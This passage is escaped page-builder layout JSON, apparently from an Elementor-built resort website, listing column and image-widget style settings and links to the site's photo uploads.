_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"0b35019\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3572.jpg\",\"id\":270},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"87f5b0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Fishing09-002.jpg\",\"id\":312},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"509de7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"299a10a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e4da443\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"26eb2dd\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"6793696\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3601.jpg\",\"id\":169},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"76d42c8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2605.jpg\",\"id\":176},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"